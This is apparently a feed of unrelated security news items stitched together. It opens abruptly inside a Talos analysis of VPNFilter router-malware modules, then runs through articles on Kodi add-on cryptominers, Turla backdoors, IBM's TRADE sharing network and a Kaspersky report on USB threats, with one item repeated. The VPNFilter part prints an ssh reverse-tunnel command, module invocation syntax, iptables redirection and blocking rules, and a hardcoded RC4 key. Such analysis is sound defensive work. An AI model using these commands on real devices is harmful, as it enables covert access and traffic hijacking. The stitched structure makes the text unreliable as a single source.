`ssh -N -T -y -p <port> -R :127.0.0.1:63914 <user>@<host>`

'nm' (network mapper)


The 'nm' module is used to scan and map the local subnet. It iterates through all interfaces and starts by ARP scanning for all hosts on the subnet associated with each IP assigned to the interface. Once an ARP reply is received, nm will send an ICMP echo request to the discovered host. If an ICMP echo reply is received it will continue mapping by performing a port scan, trying to connect to the following remote TCP ports on the host: 9, 21, 22, 23, 25, 37, 42, 43, 53, 69, 70, 79, 80, 88, 103, 110, 115, 118, 123, 137, 138, 139, 143, 150, 156, 161, 190, 197, 389, 443, 445, 515, 546, 547, 569, 3306, 8080 or 8291.

Next, it uses the MikroTik Network Discovery Protocol (MNDP) to locate any other MikroTik devices on the local network. If a MikroTik device replies to the MNDP ping, nm extracts the MAC address, system identity, version number, platform type, uptime in seconds, RouterOS software ID, RouterBoard model, and interface name from the discovered device.

The nm module looks in /proc/net/arp to get information about the infected device's ARP table, revealing the IP and MAC addresses of neighboring devices. Next, the entire contents of /proc/net/wireless are gathered.

The module performs a traceroute by first creating a TCP connection to 8.8.8.8:53 to confirm its availability (no data is sent), then ICMP echo requests are repeatedly sent to this IP with increasing TTLs.

All of the network information that is gathered is saved to a temporary file named /var/run/repsc_<time stamp>.bin. An example .bin file is as follows:
The code responsible for the SSDP, CDP and LLDP functions was present within the module but was never called in the samples analyzed and therefore will always be empty.

The nm module requires three command line arguments to operate properly, but only the first parameter is used. Like several other modules, the first parameter is a folder, and this is the location where the data is permanently saved. The final task performed by the nm module is the moving of the temporary .bin file containing the results of the scan to a folder specified as the first command line argument, ostensibly for later exfiltration by the main VPNFilter process.

'netfilter' (denial-of-service utility)


netfilter expects three arguments to be given on the command line. The first two arguments are unused, and the third argument is a quoted string in the format "<block/unblock> <# of minutes>." '# of minutes' is how long netfilter should execute for before exiting. If 'block' was used as the first part of the third argument, netfilter adds the following rule to iptables:

Chain FORWARD (policy ACCEPT)
target     prot opt source         destination
DROP        tcp -- anywhere        anywhere       tcpflags: PSH/PSH

After adding this rule, netfilter waits 30 seconds and then deletes this rule. If there is still time remaining based on the '# of minutes' value, this process begins again. The addition and deletion loop ensures that the rule persists in the event the rule is deleted from the device.

Once the number of minutes has elapsed, the program exits. Signal handlers are also installed at the beginning of the netfilter program that deletes the iptables rule and then exit if the program receives either a SIGINT or SIGTERM. This is done so the device works as normal in the event someone manually terminates the netfilter program.

Finally, the 'unblock' argument can be used to delete the iptables rule that was previously added using the 'block' argument.

Although there are no other code paths possible, there are indications that there is or could have been something more to this module.

The first indicator is that all of the different netfilter module samples that Talos analyzed (MIPS, PPC, Tile-GX) contain the same list of 168 CIDR IP addresses and ranges which tie to the following companies/services:

31.13.64.51 - WhatsApp
169.44.36.0/25 - WhatsApp
203.205.167.0/24 - Tencent (Owner of QQ Chat)
52.0.0.0/16 - Amazon.com, Inc. (The following encrypted applications have used multiple IPs in this range: Wikr, Signal, Dust and Confide)

This indicates that the netfilter module may have been designed to deny access to specific forms of encrypted applications, possibly in an attempt to herd victim communications to a service that the actor preferred they use. Interestingly, Telegram, an extremely popular encrypted chat application, is missing from the list.

However, we were unable to find any references to these strings in the code. All versions of netfilter that we have samples for have this same IP range list but do not appear to use it. It's possible that the samples we have are incomplete.

The iptables rule that is added by the netfilter module drops TCP packets with the PUSH flag set. This rule would likely use iptables rules that block all packets not just TCP packets with the PUSH flag set if its purpose is to provide attackers with the ability to launch denial-of-service attacks using compromised devices. Typically, a rule like this would be useful as part of a man-in-the-middle attack enabling attackers with access to the devices to intercept forwarded traffic, manipulate it, then manually forward it. This might explain the list of CIDR ranges as a list of IPs to intercept. We were unable to locate any indication of this sort of functionality present within the samples that were analyzed.

We have concluded that the IPs are not used. This may be due to them being left over from an older version of the netfilter module, functionality that has not yet been implemented, or there may be modifications to the statically linked iptables library made by the malware authors that we haven't found yet. The VPNFilter authors have modified open-source code before (e.g. the ndbr module), so it's not unexpected that they would change the libiptc code linked in the netfilter module.

'portforwarding' (Allows the forwarding of network traffic to attacker specified infrastructure)


The portforwarding module is designed to be executed with the following command line arguments:

./portforwarding <unused> <unused> "start <IP1> <PORT1> <IP2> <PORT2>"

Given these arguments, the portforwarding module will forward traffic from a particular port and IP combination to another port and IP by installing the following iptables rules:

iptables -t nat -I PREROUTING 1 -p tcp -m tcp -d <IP1> --dport <PORT1> -j DNAT --to-destination <IP2>:<PORT2>

iptables -t nat -I POSTROUTING 1 -p tcp -m tcp -d <IP2> --dport <PORT2> -j SNAT --to-source <device IP>

These rules cause any traffic passing through the infected device that is destined to IP1:PORT1 to be redirected to IP2:PORT2 instead. The second rule then changes the source address of the rerouted traffic to that of the infected device to ensure the responses are sent back to the infected device.

As a precaution, before installing the iptables rules, the portforwarding module first checks that IP2 is available by creating a socket connection to IP2 on PORT2. However, no data is sent before the socket is closed.

Like other modules that manipulate iptables, the portforwarding module enters a loop that adds the rules, waits a period of time, deletes the rules and then adds them again to ensure that the rules persist on the device even if they are manually deleted.

'socks5proxy' (Enables establishment of a SOCKS5 proxy on compromised devices)


The socks5proxy module is a SOCKS5 proxy server that appears to be based on the open-source project shadowsocks. The server uses no authentication and is hardcoded to listen on TCP port 5380. Before the server is started, socks5proxy forks to connect to a C2 server specified in arguments supplied to the module. If the server does not respond within a few seconds, the fork kills its parent process (the server) and then exits. The C2 server can respond with commands to execute normally or terminate the server.

This module contains the following usage strings, though they do not line up with the arguments for the socks5proxy module, and these settings cannot be modified through command line arguments:

ssserver
    --username <username> username for auth
    --password <password> password for auth
    -p, --port <port> server port, default to 1080
    -d run in daemon
    --loglevel <level> log levels: fatal, error, warning, info, debug, trace
    -h, --help help

The actual command line arguments for the socks5proxy module are:

./socks5proxy <unused> <unused> "start <C&C IP> <C&C port>"

The socks5proxy module verifies the argument count is greater than 1, but the process crashes with a SIGSEV signal if two arguments are given, indicating that there may be limited or poor quality control during some phases of development for this malware toolchain.

'tcpvpn' (Enables establishment of a Reverse-TCP VPN on compromised devices)


The tcpvpn module is a Reverse-TCP VPN, designed to allow a remote attacker to access internal networks behind infected devices. It accomplishes this by beaconing to a remote server, which could be set up like a TunTap device to forward packets over the TCP connection. The connection is seen as outbound by network devices, which may help the module bypass simple firewalls or NAT issues. This module is similar in concept to penetration testing software Cobalt Strike's VPN Pivoting.

All data sent through the connection is encrypted with RC4, with a key generated by the hardcoded bytes:

"213B482A724B7C5F4D77532B45212D215E79433D794A54682E6B653A56796E457A2D7E3B3A2D513B6B515E775E2D7E533B51455A68365E6A67665F34527A7347"

Which are sandwiched between the port numbers of the current connection (e.g., "58586!;H*rK|_MwS+E!-!^yC=yJTh.ke:VynEz-~;:-Q;kQ^w^-~S;QEZh6^jgf_4RzsG80").

The command line syntax associated with the tcpvpn module are:

./tcpvpn <unused> <unused> "start <C&C IP> <C&C port>"

MikroTik Research


Introducing the Winbox Protocol Dissector


During our research into VPNFilter, we needed to determine how some of the devices were compromised. While examining the MikroTik series of devices, we noticed an open port (TCP 8291) and that the configuration tool "Winbox" uses that port for communication.

The traffic from these devices appeared as large blobs of binary data, so we weren't able to determine potential avenues of access using this protocol without a protocol dissector (which to our knowledge, didn't exist publicly). We decided to develop our protocol dissector for use with packet analysis tools such as Wireshark to learn more about the protocol, which would allow us to design effective rules to prevent future infections once potential attack vectors were discovered.

An example of such an attack vector is CVE-2018-14847 which allows an attacker to perform a directory traversal for unauthenticated credential recovery. The dissector proved extremely helpful when we wrote coverage for this vulnerability (Snort SID: 47684). While an update for this vulnerability has been released, we think it's essential for security professionals to be able to monitor this traffic to help identify any other potentially malicious traffic.

Privacy can still be maintained by ensuring that you either use "secure mode" to encrypt communications or download the latest Winbox client which communicates over encrypted channels only. This tool will NOT decrypt encrypted communications. The latest MikroTik CCR firmware version we tested (6.43.2), enforces the usage of this newer Winbox client though this is only enforced client-side. This means that you CAN still communicate over insecure channels using a custom-made client. Therefore, we believe this Wireshark dissector remains useful because an attacker can still deliver an exploit without having to reimplement said secure communications.

What is the "Winbox Protocol?"


The term "Winbox" comes from the Winbox client offered by MikroTik as an alternative to the web GUI.

From the official documentation, Winbox is a small utility that allows for the administration of MikroTik RouterOS using a fast and simple GUI. It is a native Win32 binary but can be run on Linux and MacOS (OSX) using Wine, an open-source compatibility layer. All Winbox interface functions are as close as possible to mirroring the console functions — that is why there are no Winbox sections in the manual. Some of the advanced and critical system configurations are not possible from Winbox, like changing the MAC address on an interface.

The term "Winbox Protocol" is not official, as far as we know. It's simply the term we chose since it matches the name of their client.

Using the dissector


Installation is simple, and since this is a LUA-based dissector, recompilation is not necessary. Simply drop the Winbox_Dissector.lua file into your /$HOME/.wireshark/plugins folder. By default, any TCP traffic to or from TCP port 8291 will be properly decoded as Winbox traffic once the dissector is installed.

While a single message from the client/server to its destination would be preferable for parsing purposes, this is not always the case and observing live communications proved that there are many ways that Winbox messages can be formatted and sent.

Below is an example of a Winbox communications capture that has the following properties:
  • Multiple messages sent in the same packet.
  • Messages containing one or more two-byte "chunks" that need to be removed before parsing.
  • Messages too long for a single packet — TCP reassembly applied.
  • Messages containing additional "nested" messages
Here is how the capture is displayed before installing the dissector:
The communications are correctly parsed in Wireshark following installation of the Winbox protocol dissector:

Obtaining the Dissector


To improve the security community's ability to analyze these communications and to monitor for threats that may attempt to take advantage of the Winbox Protocol, Cisco Talos is releasing this dissector for public use. For additional information and to obtain the dissector, please see the GitHub repository here.

Conclusion


As a result of the capabilities we previously discovered in VPNFilter coupled with our new findings, we now confirm that VPNFilter provides attackers all of the functionality required to leverage compromised network and storage devices to further pivot into and attack systems within the network environments that are being targeted.

It also allows attackers to leverage their access to sensitive systems such as gateway and routing devices to perform activities such as network mapping and endpoint exploitation, network communications monitoring and traffic manipulation, among other serious threats. Another dangerous capability provided by VPNFilter is the ability to turn compromised devices into proxies that could be leveraged to obfuscate the source of future, unrelated attacks by making it appear as if the attacks originate from networks previously compromised by VPNFilter. The sophisticated nature of this framework further illustrates the advanced capabilities of the threat actors making use of it, as well as the need for organizations to deploy robust defensive architectures to combat threats such as VPNFilter.

With this new understanding of VPNFilter, most of our unanswered questions about the malware itself have now been answered. However, there are still significant unknowns about this threat that linger to this day:

How did the actor gain initial access to affected devices?

While we strongly assess that they utilized widely known, public vulnerabilities based on the makes/models affected by VPNFilter, we still don't have definitive proof of this.

Is the actor attempting to reconstitute their access?

Based on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the Cyber Threat Alliance) countered the threat earlier this year. Most C2 channels for the malware have been mitigated. The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener.

Does this mean the actor has abandoned this expansive foothold into the small and home office (SOHO) network device space? Are they instead reconstituting their access by starting over, re-exploiting and dropping new unknown malware? Have they given up on having broad worldwide SOHO access in favor of a more tailored approach only going after specific key targets?

Whatever the answers may be, we know that the actor behind VPNFilter is extremely capable and driven by their mission priorities to continually maneuver to achieve their goals. In one form or another, they continue to develop and use the tools and frameworks necessary to achieve their mission objective(s).

IOCs


a43a4a218cf5755ce7a7744702bb45a34321339ab673863bf6f00ac193cf55fc
aac52856690468687bbe9e357d02835e9f5226a85eacc19c34ff681c50a6f0d8
13165d9673c240bf43630cddccdc4ab8b5672085520ee12f7596557be02d3605
b81f857cd8efab6e6e5368b1c00d93505808b0db4b773bee1843a3bc948d3f4f
809f93cbcfe5e45fae5d69ca7e64209c02647660d1a79b52ec6d05071b21f61a
7ff2e167370e3458522eaa7b0fb81fe21cd7b9dec1c74e7fb668e92e261086e0
81368d8f30a8b2247d5b1f8974328e9bd491b574285c2f132108a542ea7d38c7
b301d6f2ba8e532b6e219f3d9608a56d643b8f289cfe96d61ab898b4eab0e3f5
99e1db762ff5645050cea4a95dc03eac0db2ceb3e77d8f17b57cd6e294404cc7
76bf646fce8ff9be94d48aad521a483ee49e1cb53cfd5021bb8b933d2c4a7f0f
e009b567516b20ef876da6ef4158fad40275a960c1efd24c804883ae273566b0
7c06b032242abefe2442a8d716dddb216ec44ed2d6ce1a60e97d30dbba1fb643
f8080b9bfc1bd829dce94697998a6c98e4eb6c9848b02ec10555279221dd910a
4e350d11b606a7e0f5e88270938f938b6d2f0cc8d62a1fdd709f4a3f1fa2c828
f1cf895d29970c5229b6a640c253b9f306185d4e99f4eac83b7ba1a325ef9fb8
8395e650e94b155bbf4309f777b70fa8fdc44649f3ab335c1dfdfeb0cdee44ff
a249a69e692fff9992136914737621f117a7d8d4add6bac5443c002c379fe072
5e75b8b5ebbef78f35b00702ced557cf0f30f68ee08b399fc26a3e3367bb177b
fe022403a9d4c899d8d0cb7082679ba608b69091a016e08ad9e750186b1943dd
116d584de3673994e716e86fbb3945e0c6102bfbd30c48b13872a808091e6bc9
4263c93ce53d7f88c62fecb6a948d70e51c19e1049e07df2c70a467bcefee2c8
5d70e7dd5872cc0d7d0f7015c11400e891c939549c01922bff2bbe3b7d5d1ce3
5c52f115ab8a830d402fac8627d0bfdcbbfd4dcf0e6ad8154d49bb85387893aa
e75e224c909c9ead4cb50cd772f606407b09b146051bfb28015fcbe27b4a5e8d
999f14044f41adfd9fb6c97c04d7d2fd9af01724b3ab69739acf615654abfa43
b118b23a192f372616efe8c2b12977d379ac76df22493c14361587bd1cc8a804
7ba0dc46510492a7f6c9b2bcc155333898d677cd8a88fe0e1ac1ad3852f1c170
83b3dbf7f6bc5f98151b26781fa892fc1a014c62af18c95ae537848204f413b8
fce03f57b3fd3842efac3ce676687794c4decc29b612068e578134f3c4c4296a
1f26b69a353198bb047dde86d48198be8271e07f8c9d647d2f562207e1330a37
1e824654afba03678f8177e065c487a07192069711eeb4abe397010771b463b5
84227f906c7f49071d6598b9035fc785d2b144a6349d0cf7c29177c00db2dc2f
6eb09f805a68b29c9516d649019bea0bb4796e504ca379783455508a08f61087
aa5baa135b2ada5560833747260545d6a5b49558f6244c0f19443dc87c00294d
4c5e21125738c330af1bfe5cabc5f18fa14bbef53805dda2c3c31974555f7ec5
0f3746f273281472e7181f1dd1237f0c9fc26f576a883f42413c759f381006c4
acfc72b8d6611dc9cd6a3f1a4484aa0adfb404ad5faaa8b8db5747b0ff05bc22
fe9c17ac036622b2d73466f62b5d095edda2d3b60fa546a48d0bb18f8b11059f
830091904dab92467956b91555bc88fa7e6bbde514b8a90bb078c8a3bb2f39a9
5a28ad479d55275452e892b799c32803f81307079777bb1a5c4d24477206d16b
8440128350e98375b7eff67a147dfe4e85067d67f2ad20d9485f3de246505a5f
275c4e86218915c337d7e37e7caba36cb830512b17353bf9716c4ba6dceb33ed
b700207c903e8da41f33f11b69f703324ec79eb56c98b22efaeac0a10447ec44
2aa149a88539e8dd065c8885053a30d269be63d41a5db3f66c1982202761aa75
1a11240d0af108720de1a8a72ceadef102889f4d5679c1a187559d8d98143b0b
3b6be595b4183b473964345090077b1df29b0cace0077047b46174cc09c690e1
620c51f83457d0e8cb985f1aff07c6d4a33da7566297d41af681ae3e5fbd2f80
4c8da690501c0073a3c262a3079d8efac3fea9e2db9c55f3c512589e9364e85c
d92282acf3fea66b05a75aba695e98a5ea1cc1151f9e5370f712b69a816bf475
30382c1e7566d59723ff7ef785a1395711be64873dbca6d86691b1f5d86ba29f

Coverage


The following new coverage has been developed to detect additional modules used by VPNFilter

New Snort for ndbr:

sid:1:47377:1

New Clam AV:

Unix.Trojan.Vpnfilter_htpx-6596262-0
Unix.Trojan.Vpnfilter_ndbr-6598711-0
Unix.Trojan.Vpnfilter_netfilter-6599563-0
Unix.Trojan.Vpnfilter_nm-6598714-0
Unix.Trojan.Vpnfilter_portforwarding-6599587-0
Unix.Trojan.Vpnfilter_socks5proxy-6599614-0
Unix.Trojan.Vpnfilter_tcpvpn-6606298-0

Updated Clam AV:

The following ClamAV signatures were updated to improve detection of additional Stage 1 and Stage 2 modules used by VPNFilter:

Unix.Trojan.Vpnfilter-6425812-1
Unix.Trojan.Vpnfilter-6550592-1

Banking trojan found in call recorder app on Play Store – stole over €10,000

By Waqas

Android is one of the most vulnerable mobile operating systems with hackers developing new Android malware and banking trojan every 17 seconds. Then, there is Google and questionable security measures to protect users from sophisticated and persistent malware attacks. Recently, Lukas Stefanko, an IT security researcher at ESET has discovered a nasty piece of banking trojan targeting […]

This is a post from HackRead.com Read the original post: Banking trojan found in call recorder app on Play Store – stole over €10,000

TRusted Anonymous Data Exchange (TRADE) Threat Intelligence Sharing With Blockchain

Co-authored Yair Allouche.

Former U.S. Secretary of Defense Donald Rumsfeld once said, “See that the President, the Cabinet and staff are informed. If cut out of the information flow, their decisions may be poor, not made, or not confidently or persuasively implemented.”

As we saw with the discovery of the WireX malware, threat intelligence sharing is critical to discovering new threats. So what is inhibiting the smooth flow of the highest-value threat intelligence?

According to the Ponemon Institute, 60 percent of companies that belong to industry-specific threat sharing communities, such as the IT Information Sharing & Analysis Center (ISAC), do not share intelligence outside the organization due to fear of revealing a breach and the resulting liability from that disclosure. Inadvertently revealing a vulnerability or breach leaves companies open to reputational brand damage and the threat of legal action.

Smarter Threat Intelligence Sharing With TRADE

IBM’s security research lab in Be’er Sheva, Israel invented a new way to share threat intelligence that allows companies to control who has access to this data (without revealing the source of the information) and the quality of the anonymous information they consume (without knowing exactly which organization contributed the information).

TRusted Anonymous Data Exchange (TRADE) is an IBM Hyperledger Fabric (blockchain) network that allows members to exchange information by leveraging smart contracts to define the levels of trust and anonymity required to enable collaboration. A smart contract is used to enforce organizational requirements for attributes such as reputation and contribution levels to limit who has access to the threat intelligence information that members publish.

TRADE leverages existing threat intelligence exchange protocols — such as Trusted Automated Exchange of Intelligence Information (TAXII) and Structured Threat Information Expression (STIX) — that are integrated with operational workflows. Each time a member of the networks contributes, accesses or enriches threat information, the transaction is recorded on the blockchain. This way, a full history of the information flow is immutably recorded and can be audited if necessary at a later date.

Establishing Trust Without Coverage Gaps or Delays

There are two common models for establishing trust in threat intelligence sharing communities today. The first is based on a trusted third party, and the second is point to point based on trust established through personal relationships. Both of these models have drawbacks that are addressed by TRADE. The third-party model introduces the trusted third party as a bottleneck, delaying the spread of crucial threat intelligence. Trust based on personal relationships inherently has coverage and scalability gaps. Using blockchain permits TRADE to mimic the peer-to-peer trust model, but without coverage gaps or delays.

Another Ponemon Institute study noted that the value of threat intelligence diminishes within minutes, so timely dissemination of this information is crucial to stopping attackers before they can cause widespread damage. TRADE allows threat analysts to quickly get the freshest data out to their peers, referred to as coalition members, without risk to the organization.

How TRADE Ensures Data Reliability With Karma

When threat intelligence is shared anonymously and organizations can opt in to information sharing coalitions at will, how do you avoid the “free rider” problem? What is the incentive for threat analysts to share data in a world where no one knows whether or not they are sharing? TRADE solves this problem by rewarding karma for information shared. To receive and consume threat intelligence data, organizations must spend the karma they’ve earned.

But if organizations are incented to contribute threat intelligence so they can then consume threat intelligence, what prevents them from anonymously contributing low-value data? In TRADE, each coalition member can gain or lose reputation based on the quality of the data they contribute. When a member spends karma to receive threat intelligence data that turns out to be flawed or misrepresented, he or she can rate the contribution.

Organizations can earn karma discounts for acquiring future threat intelligence by providing a rating for the information they received. If an organization’s reputation falls too low because it submitted low-quality data, they will not be able to access critical threat intelligence. This feature of TRADE ensures data reliability by isolating violators and cheaters.

Enabling Threat Intelligence to Move Freely

Western novelist Louis L’Amour wrote, “Knowledge is like money: to be of value it must circulate, and in circulating it can increase in quantity and, hopefully, in value.” It’s our hope that TRADE will allow threat intelligence to circulate more freely, leading to an increase in high-quality information that organizations can use to protect themselves from the latest threats.

The post TRusted Anonymous Data Exchange (TRADE) Threat Intelligence Sharing With Blockchain appeared first on Security Intelligence.

Crooks leverages Kodi Media Player add-ons for malware distribution

Security experts have spotted a Monero cryptomining campaign that abused Kodi add-ons to deliver miner that target both Linux and Windows systems.

Crooks are abusing Kodi Media Player to distribute malware, researchers from ESET recently spotted a cryptomining campaign that compromised about over 5,000 computers.

Kodi users can add new functionality by installing add-ons that are available on the official Kodi repository and in several third-party stores

An attacker can deliver malicious code by compromising the add-ons that are automatically updated by the Kodi media player.

According to ESET researchers, attackers can target Kodi to spread malware using three different mechanisms:

  1. They add the URL of a malicious repository to their Kodi installation so as to download some add-ons. The malicious add-on is then installed whenever they update their Kodi add-ons.
  2. They install a ready-made Kodi build that includes the URL of a malicious repository. The malicious add-on is then installed whenever they update their Kodi add-ons.
  3. They install a ready-made Kodi build that contains a malicious add-on but no link to a repository for updates. They are initially compromised, though receive no further updates to the malicious add-on. However, if the cryptominer is installed, it will persist and receive updates.

The malicious code distributed in this campaign is able to compromise both Windows and Linux platforms. It is a multi-stage malware that implements measures to make it hard for analysts to trace the malicious code back to the add-on.

Attackers added the malicious add-on to the XvMBC, Bubbles, and Gaia repositories.

Most of the infections were observed in the United States, Israel, Greece, the United Kingdom, and the Netherlands.

Kodi

“After victims add the malicious repository to their Kodi installation, the malicious repository serves an add-on named script.module.simplejson – a name matching that of a legitimate add-on used by many other add-ons.  However, while other repositories only have the script.module.simplejson add-on at version 3.4.0, the malicious repository serves this add-on with version number 3.4.1.” continues the repository.

“Since Kodi relies on version numbers for update detection, all users with the Auto Update feature enabled (which is a common default setting) will automatically receive script.module.simplejson version 3.4.1 from the malicious repository.”

Although the main repositories used in this campaign are now either closed or cleaned, many devices are still running the malicious add-ons to mine Monero.

Researchers from ESET, revealed that crooks behind the campaign have already mined about $6,700 worth of Monero.

“According to these statistics of the malware authors’ Monero wallet, provided by Nanopool, a minimum of 4774 victims are affected by the malware at the time of writing, and have generated 62,57 XMR (about 5700 EUR or 6700 USD) as of this writing.” concludes the report.

Further details, including the IoCs, are available in the report.

Pierluigi Paganini

(Security Affairs – Kodi, malware)

The post Crooks leverages Kodi Media Player add-ons for malware distribution appeared first on Security Affairs.

Cryptocurrency mining malware increases 86%

McAfee released its McAfee Labs Threats Report September 2018, examining the growth and trends of new cyber threats in Q2 2018. In the second quarter, they saw the surge in cryptomining malware growth that began in Q4 2017 continue through the first half of 2018. McAfee also saw the continued adaptation of the type of malware vulnerability exploits used in the WannaCry and NotPetya outbreaks of 2017. Although less common than ransomware, cryptomining malware has … More

The post Cryptocurrency mining malware increases 86% appeared first on Help Net Security.

The State of Security: Malware in the Cloud: What You Need to Know

Cloud security is not as simple as it may seem. Businesses have a shared security responsibility with cloud service providers, but some lack the knowledge to keep up their share of the bargain. Poor configuration and data leaks are common problems that many businesses encounter in the cloud. These issues can lead to malware infecting […]… Read More

The post Malware in the Cloud: What You Need to Know appeared first on The State of Security.



The State of Security

Malware in the Cloud: What You Need to Know

Cloud security is not as simple as it may seem. Businesses have a shared security responsibility with cloud service providers, but some lack the knowledge to keep up their share of the bargain. Poor configuration and data leaks are common problems that many businesses encounter in the cloud. These issues can lead to malware infecting […]… Read More

The post Malware in the Cloud: What You Need to Know appeared first on The State of Security.

Victims of Turla Backdoor More Numerous Than Originally Thought

Researchers determined that the victims of a backdoor developed by the advanced persistent threat (APT) group Turla are more numerous than originally expected.

The threat group recently employed the backdoor to access the foreign offices of two European countries and a major defense contractor, according to Slovakian IT security company ESET. Those victims received less publicity than Germany’s Federal Foreign Office, which the group breached after compromising the network of the country’s Federal College of Public Administration.

The most recent versions of Turla’s invention went after targets’ inboxes by subverting Microsoft Office’s Messaging Application Programming Interface (MAPI). They were fully controllable by email and didn’t rely on a conventional command-and-control (C&C) server. Instead, the backdoors used specially crafted PDF files in email attachments to fulfill a series of commands such as data exfiltration. The most recent variant from April 2018 was also capable of executing PowerShell commands by leveraging Empire PSInject.

Turla’s Threat Innovation Continues

In 2017, ESET observed Turla leveraging another backdoor called Gazer to target embassies and government organizations around the world. A year later, researchers found evidence that the threat group was bundling the backdoors with a legitimate Adobe Flash Player installer and using URLs and IP addresses that appeared identical to Adobe’s actual infrastructure.

Given ESET’s most recent findings, Turla is showing no signs of slowing down its efforts to spy on promising targets and secretly infect networks with malware for as long as possible.

How to Block an Email-Borne Backdoor

To defend against this and other backdoor threats, security teams should monitor for the indicators of compromise (IoCs) listed in the IBM X-Force Exchange threat advisory. Security experts also recommend following the National Institute of Standards and Technology’s (NIST) cybersecurity framework and conducting security awareness training to educate employees about email-based threats.

Sources: ESET, ESET(1), ESET(2)

The post Victims of Turla Backdoor More Numerous Than Originally Thought appeared first on Security Intelligence.

USB threats from malware to miners

Introduction

In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.

USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.

Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.

USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.

This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.

Methodology and key findings

The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).

Key findings

  • USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
  • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
  • One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
  • Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
  • The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
  • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
  • Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.

The evolving cyberthreat landscape for USBs

Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.

This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.

These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.

*Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

*Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN (download)

USBs as a tool for advanced threat actors

USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.

USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.

Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.

The Stuxnet survivor CVE-2010-2568

Microsoft fixed the last of the vulnerable LNK code path in March 2015. However, in 2016, as many as one in four Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this vulnerability, (although it was overtaken in 2017 by the EternalBlue exploit). However, CVE-2010-2568 continues to feature in malware distributed by USB devices and other removable media: where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.

Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 – 2018. Source: KSN (download)

If the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.

Malware delivered via removable media

The top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of Windows LNK malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The WinLNK Runner Trojan, which was the top detected USB threat in 2017, is used in worms for launching executable files.

In 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.

